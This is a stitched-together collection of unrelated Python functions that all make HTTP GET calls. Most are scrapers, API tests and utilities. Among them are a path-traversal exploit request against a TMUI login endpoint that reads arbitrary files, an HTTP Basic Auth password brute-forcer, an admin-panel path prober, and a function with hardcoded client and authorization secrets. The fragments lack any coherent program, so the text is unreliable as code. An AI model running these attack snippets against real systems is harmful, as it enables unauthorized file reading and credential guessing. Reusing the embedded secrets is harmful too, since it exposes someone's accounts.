def test_genbank_extension(self): headers = self.headers url = self.run_url block1 = { "metadata": { "authors": [], "version": "0.0.0", "tags": {} }, "options": [], "components": [], "rules": {}, "notes": {} } res = POST(self.api_url + "block", data=json(block1), headers=headers) block_id = res.json()["id"] input1 = { "genbank": "extensions/compute/genbank_to_block/sequence.gb", "sequence": "/api/file/block/" + block_id + "/sequence" } res = POST(url + "genbank_to_block", data=json(input1), headers=headers) self.assertTrue(res.status_code == 200) res = res.json() self.assertTrue("block" in res) block = parse(res["block"]) block["sequence"]["url"] = input1["sequence"] res = PUT(self.api_url + "block/" + block_id, data=json(block), headers=headers) self.assertTrue(res.status_code == 200) res = GET(self.api_url + "block/" + block_id, headers=headers) self.assertTrue(res.status_code == 200) self.assertTrue(res.json()["id"] == block_id) self.assertTrue(res.json()["sequence"]["url"] == input1["sequence"]) res = GET(self.api_url + "file/block%2f" + block_id + "%2fsequence", headers=headers) self.assertTrue(res.status_code == 200) self.assertTrue(len(res.text) > 1000)
def idou(file, ext): html = GET("https://www.google.co.jp/search?q={0} {1}".format( file, keyword)).text bs = BeautifulSoup(html, 'lxml') print("\n" + "-" * 15 + file + "-" * 15) print(bs.find_all(class_="BNeawe vvjwJb AP7Wnd")[0].getText().strip()) print(bs.find_all(class_="BNeawe vvjwJb AP7Wnd")[1].getText().strip()) print(bs.find_all(class_="BNeawe vvjwJb AP7Wnd")[2].getText().strip()) print(bs.find_all(class_="BNeawe vvjwJb AP7Wnd")[3].getText().strip()) for el in bs.select("h3.r a"): title = el.get_text() print(title) add_name = input() if add_name == "a": pass webbrowser.open("https://www.google.co.jp/search?q={0}+{1}".format( file, keyword)) add_name = "" add_name = input() os.rename("{0}/{1}{2}".format(folder_name, file, ext), "{0}/[{1}] {2}{3}".format(folder_name, add_name, file, ext)) else: os.rename("{0}/{1}{2}".format(folder_name, file, ext), "{0}/[{1}] {2}{3}".format(folder_name, add_name, file, ext))
def google_search(word): htmlfile = GET("https://www.google.co.jp/search?q="+word).text soup = BeautifulSoup(htmlfile, "lxml") pages = soup.find_all("h3",class_="r") title = [pages[i].a.text for i in range(3)] link = [pages[i].a.get("href")for i in range(3)] [print("----------------------\n\r["+title[i]+"]\n\r["+link[i]+"]") for i in range(3)]
def collect_things(endpoint): parameters = {"per_page": 100} response = GET(endpoint, parameters) link_headers = parseLinkHeader(response.headers) things = response.json() while 'next' in link_headers: response = GET(link_headers['next'], params=parameters) link_headers = parseLinkHeader(response.headers) things = things + response.json() return things
def request_extra(self, url: str, with_custom_proxy=False, proxy: str = None) -> Response: """ Same functionality as request methof but it gathers the data from a not predefined url :param url: target url :param with_custom_proxy: boolean to turn on a custom proxy stored in the resources folder :param proxy: If is None, no proxy will be used :return: Response object """ if proxy != None: return GET(url, proxies={"https": "https://" + proxy}) return GET(url, proxies={"https": self.selected_proxy} if with_custom_proxy else None)
def get(self, request, *args, **kwargs): host = request.get_host() protocol = '' if request.is_secure(): protocol = 'https://' else: protocol = 'http://' url = protocol + host + str( reverse_lazy('collaborate:get_user', kwargs=kwargs)) data = GET(url).json() groups = data['groups'] personal_index = 0 for group in groups: if 'personal' in group['name'].lower(): break personal_index += 1 personal = None try: personal = groups.pop(personal_index) finally: return render(request, template_name='work_area.html', context={ 'groups': groups, 'personal': personal })
def read(): latest = GET('http://pastebin.com/archive').content soup = BeautifulSoup(latest, "lxml") table = soup.select('table.maintable') links = table[0].findAll('a') urls = [link['href'] for link in links if len(link['href']) < 10] return urls
def GetHomePage(self): if not exists(self.path): response = GET(self.URL, headers=self.headers) content = self._parse_html(response.text) content = core.InjectFavIcon(content, 'netflix') f = open(self.path, mode="w") f.write(content) f.close() else: if "day" in core.CompareFile(self.path): response = GET(self.URL, headers=self.headers) content = self._parse_html(response.text) content = core.InjectFavIcon(content, 'netflix') f = open(self.path, mode="w") f.write(content) f.close() return '/'.join(self.path.split("/")[2::])
def call_api(id): try: return { 'id': id, 'content': GET(f"{getenv('URL_WEB_SERVICE')}{id}").content } except Exception as e: return e
def test_foundry_api(self): headers = self.headers url = self.foundry_url res = GET(url + "inventory/ecoli", headers=headers) self.assertTrue(res.status_code == 200) res = res.json() self.assertTrue(len(res["blocks"]) > 4000)
def get_http_content(data_type, key_id): response = GET('http://3ss.mobvista.com/track/' + data_type + '/orm/' + key_id, params={"client_id": "qXJSJzzsGDPdYXR1"}, headers={"Authorization": "Basic Ozg5P5nB8qegPBhH"}) json_obj = json.loads(response.content) if data_type == 'inject_code': return json_obj['code'] return json.dumps(json_obj, indent=4, sort_keys=True)
def get(host, flagid, flag, vuln): try: r = GET("http://{}:8080{}".format(host,SLA_FILENAME[vuln]+flagid)) except: cquit(Status.DOWN) if r.status_code != 200:cquit(Status.MUMBLE) if r.text.strip() == flag:cquit(Status.OK) cquit(Status.CORRUPT)
def check(host): try: r = GET("http://{}:8080/index.php".format(host)) except Exception as e: cquit(Status.DOWN) if r.status_code == 200: cquit(Status.OK) cquit(Status.MUMBLE)
def Search(self, word): response = GET(self.SEARCH_URL + word, headers=self.headers) f_data = self._parse_html(response.text) f_data = self._change_files(f_data) f_data = core.InjectFavIcon(f_data, 'google') f = open(self.search_path, mode="w") f.write(f_data) f.close() return '/'.join(self.search_path.split("/")[2::])
def GetHomePage(self): if not exists(self.path): response = GET(self.URL, headers=self.headers) f_data = self._parse_html(response.text) f_data = self._change_files(f_data) f_data = core.InjectFavIcon(f_data, 'google') f = open(self.path, mode="w") f.write(f_data) f.close() else: if "day" in core.CompareFile(self.path): response = GET(self.URL, headers=self.headers) f_data = self._parse_html(response.text) f_data = self._change_files(f_data) f_data = core.InjectFavIcon(f_data, 'google') f = open(self.path, mode="w") f.write(f_data) f.close() return '/'.join(self.path.split("/")[2::])
def test_cloning(self): headers = self.headers url = self.api_url proj1 = { "metadata": { "authors": [], "version": "0.0.0", "tags": {} }, "components": [], "settings": {} } res = POST(url + "project", data=json(proj1), headers=headers) pid1 = res.json()['id'] res = POST(url + "clone/" + pid1, headers=headers) pid2 = res.json()['id'] res = POST(url + "clone/" + pid2, headers=headers) pid3 = res.json()['id'] res = POST(url + "clone/" + pid3, headers=headers) pid4 = res.json()['id'] res = GET(url + "project/" + pid4, headers=headers) hist = GET(url + "ancestors/" + pid4, headers=headers) self.assertTrue(hist.status_code == 200) hist = hist.json() self.assertTrue(len(hist) == 3) self.assertTrue(hist[0] == pid3) self.assertTrue(hist[1] == pid2) self.assertTrue(hist[2] == pid1) child = GET(url + "descendants/" + pid1, headers=headers) self.assertTrue(child.status_code == 200) child = child.json() self.assertTrue(len(child) == 5) self.assertTrue(len(child['leaves']) == 1)
def send_request(url:str, user:str, passwd:str): base64_value = encode_user_passwd(user, passwd) headers = {"Authorization": f"Basic {base64_value}"} try: response = GET(url, headers=headers) printer(f"{user}:{passwd}") if response.status_code == 200: exit(f"\n{Fore.GREEN}[+] {Fore.WHITE} PASSWORD FOUND : {Fore.GREEN}{user} : {passwd}{Fore.WHITE}.") except Exception as err: print(err)
def search_google(start): html = GET("https://www.google.co.jp/search?q=%s&start=%d" % (query, start)).text bs = BeautifulSoup(html, 'lxml') for el in bs.select("h3.r a"): global rank title = el.get_text() url = dict(parse_qsl(urlparse(el.get("href")).query))["q"] print('%d. %s: %s' % (rank, title, url)) rank += 1
def findAdminPanel(website): website = addHTTP(website) with open('list.txt', 'r') as f: content = f.read() panels = content.strip("").split("\n") for _panels in panels: combo = website + "/" + _panels response_code = GET(combo, headers=functions._headers, timeout=5, allow_redirects=False).status_code print(response_code)
def main(): connect = MySQLdb.connect(host=HOST, db=DB, user=USER, passwd=PASSWORD, charset='utf8mb4') connect.cursor(MySQLdb.cursors.DictCursor) cur = connect.cursor() # LINE@のエンドポイントに投げる res = GET("https://api.line.me/v2/bot/insight/followers?date=" + day, headers=headers) data = json.loads(res.text) try: """ table line_summary id int primary key auto_increment followers int default 0 targeted_reaches int default 0 blocks int default 0 """ cur.execute( "INSERT INTO line_summary( followers, targeted_reaches, blocks ) values ( %s, %s, %s )", ( data['followers'], data['targetedReaches'], data['blocks'], )) connect.commit() except Exception as e: log.error(data) connect.rollback() log.error(e) raise e try: client = slack.WebClient(token=TOKEN) output = ''' ``` LINE登録数:{number}件 / ブロック{block}件 ``` '''.format(number=data['followers'], block=data['blocks']).strip() r = client.chat_postMessage(channel=TARGET, text=output) log.info(TARGET + ' slack update') except Exception as e: connect.rollback() log.error(e) raise e finally: log.info(' slack finished')
def send_request(ip: str, filename: str) -> str: r = GET( f"https://{ip}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={filename}", verify=False) try: data = r.json() output = data["output"] except: #print("[-] Exploit Failed.") return #print("[+] Exploit Successfull.") return output
def download_worker(self, task_id, url, path): with open(path, 'wb') as f, GET(url, stream=True) as rq: length = int(rq.headers.get('Content-Length', 0)) self.progress.start_task(task_id) self.progress.update(task_id, total=length) self.total_length += length self.progress.update(self.all_t, total=self.total_length) for chunk in rq.iter_content(chunk_size=4096): f.write(chunk) self.progress.update(task_id, advance=len(chunk)) self.progress.update(self.all_t, advance=len(chunk)) return task_id
def request(self, keywords: list, type_query: TypeQuery, with_custom_proxy=False, proxy: str = None) -> Response: """ Returns a response for the provided parameters :param keywords: List of str keywords :param type_query: TypeQuery for distinguish the different queries :param with_custom_proxy: boolean to turn on a custom proxy stored in the resources folder :param proxy: If is None, no proxy will be used :return: Response object """ params = self._transform_string_url(keywords, type_query) if proxy != None: return GET(self._URL, params=params, proxies={"https": "https://" + proxy}) return GET(self._URL, params=params, proxies={"https": self.selected_proxy} if with_custom_proxy else None)
def test_file_io(self): headers = self.headers url = self.api_url contents = "Hello World" path = "myDir%2fhello.txt" res = POST(url + "file/" + path, data=contents, headers=headers) self.assertTrue(res.status_code == 200) res = GET(url + "file/" + path, headers=headers) self.assertTrue(res.status_code == 200) self.assertTrue(res.text == contents)
def root(): username = request.args.get("username") client_id = env("CLIENT_ID") client_secret = env("CLIENT_SECRET") url = f"https://api.github.com/users/{username}" r_args = f"?client_id={client_id}&client_secret={client_secret}" try: r = GET(url + r_args) except: r = "<i>Request Failed: Please try again after 2 minutes.</i>" response = app.response_class(response=r, status=200, mimetype="application/json") return response
def setUp(self): self.api_url = "http://0.0.0.0:3000/api/" self.run_url = "http://0.0.0.0:3000/exec/" self.foundry_url = "http://0.0.0.0:3000/foundry/" login = GET("http://0.0.0.0:3000/login", params={ "user": "", "password": "" }) self.headers = { "Content-type": "application/json", "sessionkey": login.json()["sessionkey"] }
def execute_get(args): """Perform a GET request with the given command line parameters and print the responset to standard out. Args: args: Argparse argument object. """ headers = dict(kv.split(":") for kv in args.headers) url = args.url while True: response = GET(url, headers=headers) print(response if args.verbose else response.body) if response.code == 301 or response.code == 302: url = response.headers['Location'].strip() print('Redirecting to new url: {}'.format(url)) else: break
def draw_status(self, status, rank): self.draw_text((18, 55 + self.user_rank * 26), 20, rank) self.img.paste( Image.open( BytesIO(GET( status.user.profile_image_url_https).content)).resize( (26, 26)), (52, 52 + self.user_rank * 26)) self.draw_text((78, 55 + self.user_rank * 26), 20, status.user.name) self.draw_text( (540, 59 + self.user_rank * 26), 13, status.created_at.strftime('%H:%M:%S.') + "%03d" % round( datetime.fromtimestamp( ((status.id >> 22) + 1288834974657) / 1000.0).microsecond / 1000)) self.draw_text((633, 59 + self.user_rank * 26), 13, 'via ' + status.source) self.user_rank += 1
def call_api(id): try: save_as_pdf(id, GET(f"{getenv('URL_WEB_SERVICE')}{id}").content) return True except Exception as e: return e
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Fri Aug 24 00:13:21 2018 @author: nagano """ from urllib.parse import parse_qsl from urllib.parse import urlparse from bs4 import BeautifulSoup from requests import get as GET #'='の後を書き換える、例でUEC html = GET("https://www.google.co.jp/search?q=UEC").text bs = BeautifulSoup(html, 'lxml') for el in bs.select("h3.r a"): title = el.get_text() url = dict(parse_qsl(urlparse(el.get("href")).query))["q"] print(title) print(" ", url)